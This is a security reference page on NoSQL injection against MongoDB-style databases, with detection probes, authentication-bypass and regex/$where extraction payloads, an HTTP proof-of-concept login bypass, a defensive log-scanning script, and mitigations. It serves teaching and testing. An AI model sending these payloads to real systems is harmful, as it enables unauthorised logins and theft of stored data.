High Severity | OWASP A03:2021
🟠 NoSQL Injection
🧠 Description
What is NoSQL Injection?
NoSQL injection attacks exploit applications that pass user input into NoSQL database queries (MongoDB, CouchDB, Redis and others) without proper sanitization. Because request bodies are often parsed as JSON or nested objects, an attacker can inject query operators or code where the application expects a plain value.
NoSQL Injection allows:
- Bypass authentication
- Extract sensitive data
- Modify or delete data
- Execute server-side code (in some cases, e.g. via MongoDB's $where operator)
🏷️ Classification
- Type: NoSQL Injection
- Databases: MongoDB, CouchDB, Redis, Cassandra
- Attack Vectors: Injection via JSON, array operators, regex
🎯 Attack Surface
- ✅ Login forms
- ✅ Search functionality
- ✅ User profile queries
- ✅ API endpoints
🔍 Detection
- Test with: {"$ne": null}
- Test with: {"$gt": ""}
- Test with: ' || '1'=='1
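From the defender's side, the same probes can be spotted in traffic. The following is an added example (not part of the original page): a small Node.js scanner that walks JSON request bodies for MongoDB operator keys and also catches the bracket syntax (username[$ne]=...) that form-encoded body parsers turn into nested objects. The log lines and the `body=` log format are constructed for the example.

```javascript
// Added example (not from the original page): scan captured HTTP request
// bodies for MongoDB operator keys.  The log lines below are constructed.
const SAMPLE_LOG = [
  'POST /login body={"username":"alice","password":"s3cret"}',
  'POST /login body={"username":{"$ne":""},"password":{"$ne":""}}',
  'POST /search body={"q":{"$regex":"^ad"}}',
  'POST /search body={"$where":"this.password.length > 0"}',
  'POST /login body=username[$ne]=1&password[$ne]=1',
  'GET /profile?id=42',
];

// Recursively collect the dotted path of every key that starts with "$".
function findOperatorKeys(value, path = [], found = []) {
  if (Array.isArray(value)) {
    value.forEach((v, i) => findOperatorKeys(v, [...path, String(i)], found));
  } else if (value && typeof value === 'object') {
    for (const [k, v] of Object.entries(value)) {
      const p = [...path, k];
      if (k.startsWith('$')) found.push(p.join('.'));
      findOperatorKeys(v, p, found);
    }
  }
  return found;
}

// Inspect one body string.  JSON bodies are parsed and walked; anything
// else is checked for bracket syntax such as username[$ne]=..., which
// extended URL-encoded parsers (e.g. qs) turn into {username: {$ne: ...}}.
function inspectBody(body) {
  if (body === undefined) return [];
  try {
    return findOperatorKeys(JSON.parse(body));
  } catch (_) {
    const hits = [];
    for (const m of body.matchAll(/([^&=\[\]]+)\[(\$[A-Za-z]+)\]=/g)) {
      hits.push(`${m[1]}.${m[2]}`);
    }
    return hits;
  }
}

// One finding per log line whose body carries an operator key.
function scanLog(lines) {
  const findings = [];
  for (const line of lines) {
    const m = line.match(/^(\S+) (\S+) body=(.*)$/);
    if (!m) continue;
    const operators = inspectBody(m[3]);
    if (operators.length) findings.push({ method: m[1], path: m[2], operators });
  }
  return findings;
}

console.log(JSON.stringify(scanLog(SAMPLE_LOG), null, 2));
```

A hit on a login or search endpoint is a strong signal on its own; `$where` in any body deserves an alert, since legitimate clients never need to send it.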
💣 Basic Payloads
MongoDB Authentication Bypass
{"username": {"$ne": ""}, "password": {"$ne": ""}}
{"username": "admin", "password": {"$gt": ""}}
{"$or": [{"username": "admin"}, {"username": "root"}]}
Extract Data
{"username": {"$regex": "^ad"}}
{"$where": "this.password.length > 0"}
📝 Proof of Concept
# Login request with NoSQL injection (the body must be parsed as JSON for the operator to take effect)
POST /login HTTP/1.1
Content-Type: application/json

{"username": {"$ne": ""}, "password": {"$ne": ""}}
# Returns success - logged in as first user!
💥 Impact
Severity: HIGH
- Authentication bypass
- Data exfiltration
- Full database access
🛡️ Mitigation
✅ Use parameterized queries: Don't concatenate user input into query strings or $where expressions
✅ Input validation: Validate types and formats
✅ Sanitize operators: Strip $ operators from input
🛠️ Tools
- NoSQLMap: NoSQL injection tool
- Burp: Manual testing